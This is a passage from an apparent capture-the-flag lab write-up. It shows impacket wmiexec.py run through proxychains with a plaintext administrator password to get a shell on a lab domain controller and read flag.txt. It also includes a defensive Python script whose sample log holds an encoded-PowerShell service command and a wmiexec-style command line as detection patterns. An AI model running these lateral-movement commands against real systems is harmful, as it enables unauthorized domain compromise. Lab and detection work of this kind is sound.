   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-AB-44-EC
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::e9c2:7728:85f1:d04f%10(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-55-47-00-0C-29-AB-44-EC
   DNS Servers . . . . . . . . . . . : 192.168.93.10
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Local Area Connection* 8:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : isatap.{964D2F17-AE7C-4B46-9E2B-EB123D2EEFEA}
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest
The command completed with one or more errors.

Attack flow for 192.168.93.10

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN-8GA56TNV3MV
   Primary Dns Suffix  . . . . . . . : test.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : test.org

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-1F-54-D2
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::1fa:2f8:97ac:1160%12(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.93.10(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-2C-57-BB-00-0C-29-1F-54-D2
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{22AC77BB-4205-4120-89CB-C8F5240403E0}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

C:\>net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
win2008                  win7
The command completed with one or more errors.
C:\Users\Administrator\Desktop>whoami
test\administrator

OK: using the wmiexec.py script from the impacket package we have fully compromised the internal hosts win2008 (192.168.93.20) and WIN-8GA56TNV3MV (192.168.93.10, the domain controller).
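As an added defender-side example (my own code, not part of the original write-up), the following Python script runs detection logic for the three techniques in this section over a constructed, simplified event log: the smb_login failure-then-success pattern (section 1), the psexec service install (section 2), and the cmd.exe that wmiexec.py makes WmiPrvSE.exe spawn (section 3). The log line format, timestamps, service name and encoded-command fragment are constructed; the hosts, pivot source 192.168.93.100 and account match the lab.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real captures) in a simplified
# "<timestamp> <host> <event id> key=value ..." format assumed for this example.
# They mirror the chain in this write-up: SMB logon failures from the pivot host
# 192.168.93.100 followed by a success (smb_login), a service installed with an
# encoded PowerShell image path (psexec, "PowerShell target") and a cmd.exe
# spawned by WmiPrvSE.exe that redirects its output into ADMIN$ (wmiexec.py).
SAMPLE_LOG = r"""
2023-12-04T10:25:01 WIN7 4625 src=192.168.93.100 user=administrator logon_type=3
2023-12-04T10:25:02 WIN7 4625 src=192.168.93.100 user=administrator logon_type=3
2023-12-04T10:25:03 WIN7 4624 src=192.168.93.100 user=administrator logon_type=3
2023-12-04T10:28:30 WIN7 7045 service=hKzYcQpL path=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcA
2023-12-04T10:40:10 WIN2008 4688 parent=C:\Windows\System32\wbem\WmiPrvSE.exe cmd=cmd.exe /Q /c ipconfig /all 1> \\127.0.0.1\ADMIN$\__1701657610.1 2>&1
2023-12-04T10:41:00 WIN2008 4624 src=192.168.93.30 user=win2008 logon_type=2
2023-12-04T10:41:05 WIN2008 4688 parent=C:\Windows\explorer.exe cmd=notepad.exe
"""

# key=value pairs; a value runs until the next " key=" or end of line, so it may contain spaces
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_log(text):
    """Turn the constructed log format into event dicts (time, host, id, plus fields)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, eid, rest = line.split(maxsplit=3)
        fields = {m.group(1): m.group(2) for m in FIELD_RE.finditer(rest)}
        events.append({"time": datetime.fromisoformat(ts), "host": host, "id": int(eid), **fields})
    return events


def detect_smb_bruteforce(events, min_failures=2, window=timedelta(minutes=5)):
    """A network (type 3) logon success preceded by >= min_failures failures for the same
    host/source/user inside the window: the smb_login guess-until-hit pattern above."""
    by_key = defaultdict(list)
    for e in events:
        if e["id"] in (4624, 4625) and e.get("logon_type") == "3":
            by_key[(e["host"], e["src"], e["user"])].append(e)
    alerts = []
    for (host, src, user), evs in by_key.items():
        evs.sort(key=lambda ev: ev["time"])
        for i, e in enumerate(evs):
            if e["id"] != 4624:
                continue
            failures = sum(1 for p in evs[:i] if p["id"] == 4625 and e["time"] - p["time"] <= window)
            if failures >= min_failures:
                alerts.append(f"{host}: {failures} failed SMB logons then success for {user} from {src}")
    return alerts


# Image-path tells of a remotely pushed one-shot service: an encoded PowerShell
# command line, or a binary dropped into the ADMIN$ share.
SERVICE_PATTERNS = (
    re.compile(r"powershell(\.exe)?\s.*\s-(e|enc|encodedcommand)\s", re.I),
    re.compile(r"\\ADMIN\$\\", re.I),
)


def detect_remote_service_install(events):
    """System event 7045 (new service installed) whose image path matches SERVICE_PATTERNS."""
    alerts = []
    for e in events:
        if e["id"] == 7045 and any(p.search(e.get("path", "")) for p in SERVICE_PATTERNS):
            alerts.append(f"{e['host']}: suspicious service '{e.get('service')}' installed: {e['path'][:50]}")
    return alerts


def detect_wmiexec_shell(events):
    r"""Security event 4688 where WmiPrvSE.exe spawns cmd.exe with output redirected into
    \\127.0.0.1\ADMIN$\__<timestamp>, which is how wmiexec.py collects command output."""
    alerts = []
    for e in events:
        if e["id"] != 4688:
            continue
        parent, cmd = e.get("parent", "").lower(), e.get("cmd", "")
        if parent.endswith("wmiprvse.exe") and re.search(r"cmd\.exe\s.*\\\\127\.0\.0\.1\\ADMIN\$\\__", cmd, re.I):
            alerts.append(f"{e['host']}: WmiPrvSE.exe spawned a wmiexec-style shell: {cmd[:60]}")
    return alerts


def run_detections(log_text):
    """Run all three detections over one log text and return the alert strings."""
    events = parse_log(log_text)
    return detect_smb_bruteforce(events) + detect_remote_service_install(events) + detect_wmiexec_shell(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_LOG):
        print("[ALERT]", alert)
```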

7、get flag

┌──(root㉿ru)-[/usr/share/doc/python3-impacket/examples]
└─# proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:445  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:9898  ...  192.168.93.10:49154  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\

08/22/2013  11:52 PM    <DIR>          PerfLogs
10/28/2019  08:44 PM    <DIR>          Program Files
08/22/2013  11:39 PM    <DIR>          Program Files (x86)
10/06/2019  07:14 PM    <DIR>          Users
12/04/2023  11:18 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  52,819,361,792 bytes free

C:\>cd Users
C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/06/2019  07:14 PM    <DIR>          Administrator
08/22/2013  11:39 PM    <DIR>          Public
               0 File(s)              0 bytes
               4 Dir(s)  52,819,361,792 bytes free

C:\Users>cd Administrator
C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator

10/06/2019  07:14 PM    <DIR>          .
10/06/2019  07:14 PM    <DIR>          ..
10/30/2019  10:12 PM    <DIR>          Contacts
10/31/2019  12:52 AM    <DIR>          Desktop
10/31/2019  12:52 AM    <DIR>          Documents
10/30/2019  10:12 PM    <DIR>          Downloads
10/30/2019  10:12 PM    <DIR>          Favorites
10/30/2019  10:12 PM    <DIR>          Links
10/30/2019  10:12 PM    <DIR>          Music
10/30/2019  10:12 PM    <DIR>          Pictures
10/30/2019  10:12 PM    <DIR>          Saved Games
10/30/2019  10:12 PM    <DIR>          Searches
10/30/2019  10:12 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  52,819,357,696 bytes free

C:\Users\Administrator>cd Documents
C:\Users\Administrator\Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is D6DC-065A

 Directory of C:\Users\Administrator\Documents

10/31/2019  12:52 AM    <DIR>          .
10/31/2019  12:52 AM    <DIR>          ..
10/31/2019  12:53 AM                13 flag.txt
               1 File(s)             13 bytes
               2 Dir(s)  52,819,361,792 bytes free

C:\Users\Administrator\Documents>type flag.txt
this is flag!
C:\Users\Administrator\Documents>

Finally, we obtained the important file flag.txt on the domain controller.
